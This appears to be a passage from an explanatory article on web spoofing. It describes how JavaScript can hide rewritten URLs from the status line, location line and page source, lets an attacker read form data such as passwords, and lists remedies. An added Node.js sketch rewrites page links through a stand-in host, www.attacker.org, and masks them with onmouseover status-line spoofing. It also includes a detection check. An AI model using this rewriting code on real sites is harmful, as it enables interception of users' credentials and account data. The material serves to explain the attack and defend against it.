Perfecting the False Web
The illusion is completed as follows:
• Browser status line - The status line at the bottom of the browser
window could give the game away by showing the rewritten URLs. This is
prevented by camouflaging them with a JavaScript program that
'overwrites' the status line with the original URL whenever the victim
points at a link.
• Browser location line - The same trick is applied to the location line,
which displays the URL of the page currently shown.
• HTML source code - Viewing the document's HTML source would reveal the
rewritten URLs, if it were not for a JavaScript program that hides the
browser's menu bar and replaces it with an exact replica; when 'View
Document Source' is chosen from the replica, the original (unrewritten)
HTML is shown instead.
• Viewing document information - The same JavaScript trick covers 'View
Document Information', which would otherwise display the rewritten URL.
The attacker can now observe and alter any data going from the victim
to the Web servers and control all return traffic from the Web servers to
the victim. Since most on-line commerce is done via forms, this means
the attacker can observe any account numbers or passwords the victim
enters.
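The rewriting and the status-line camouflage described above, as an added Node.js example (not code from the original page or from the authors of the attack it describes); it also includes the location-line check suggested in the Conclusion. The attacker host www.attacker.org, the sample page, and the function names are hypothetical and exist only for illustration.

```javascript
// Added example, not part of the original page: a Node.js sketch of the
// URL-rewriting "false web" described above, plus the check a user would
// make on the location line. The attacker host www.attacker.org is a
// hypothetical name used only for illustration.
const ATTACKER = "http://www.attacker.org/";

// Rewrite an absolute URL so that the browser fetches it via the attacker's
// server, which fetches the real page and rewrites it in turn. Already
// rewritten URLs are left alone so that the prefix is never doubled.
function rewriteUrl(url) {
  return url.startsWith(ATTACKER) ? url : ATTACKER + url;
}

// Rewrite every href= and src= attribute in a page. Relative links are
// resolved against the page's real base URL first, so that they also stay
// inside the false web. For links, an onmouseover handler puts the
// original URL into window.status, so the status line at the bottom of the
// browser shows what the victim expects rather than the rewritten URL.
function rewritePage(html, baseUrl) {
  return html.replace(/\b(href|src)=(["'])([^"']*)\2/gi, (match, attr, quote, target) => {
    let absolute;
    try {
      absolute = new URL(target, baseUrl).href;
    } catch (e) {
      return match; // not a resolvable URL; leave the attribute untouched
    }
    const spoofed = rewriteUrl(absolute);
    if (attr.toLowerCase() !== "href") {
      return `${attr}=${quote}${spoofed}${quote}`;
    }
    // Escape the only character that could end the single-quoted JS string.
    const shown = absolute.replace(/'/g, "\\'");
    return `${attr}=${quote}${spoofed}${quote} onmouseover="window.status='${shown}'; return true"`;
  });
}

// Victim-side check for the remedy in the Conclusion: a rewritten URL has a
// second scheme embedded in its path, e.g.
//   http://www.attacker.org/http://home.netscape.com/
function looksRewritten(locationUrl) {
  const u = new URL(locationUrl);
  return /^\/https?:\/\//i.test(u.pathname);
}

// Does the location line point at the server the user expects?
function pointsToExpected(locationUrl, expectedHost) {
  const u = new URL(locationUrl);
  return u.hostname === expectedHost && !looksRewritten(locationUrl);
}

// Constructed sample page, standing in for what the attacker's server fetched.
const SAMPLE_PAGE =
  '<a href="http://home.netscape.com/">Netscape</a>' +
  '<a href="/login">Login</a>' +
  '<img src="/logo.gif">';

console.log(rewritePage(SAMPLE_PAGE, "http://home.netscape.com/"));
```

Run with `node` to see the rewritten page: every link now points through the attacker's host, yet hovering over a link would show the original URL in the status line. The `looksRewritten` check is exactly what "pay attention to the location line" amounts to in practice, and it is only useful if the location line itself has not been overwritten by script, which is why the Conclusion pairs it with disabling JavaScript.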
Conclusion
No foolproof remedies for this type of attack exist. One could:
• Disable JavaScript, so that the status line, location line and menu bar
cannot be overwritten.
• Make sure the location line is always visible.
• Pay attention to the location line and make sure it always points to the
expected server, not to a URL with another server's address embedded in it.
At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing
and other security attacks, so it is recommended to disable them. Doing
so will cause the loss of some useful functionality, but much of this loss
can be recouped by selectively turning on these features when visiting a
trusted site that requires them.
No long-term solution is in sight.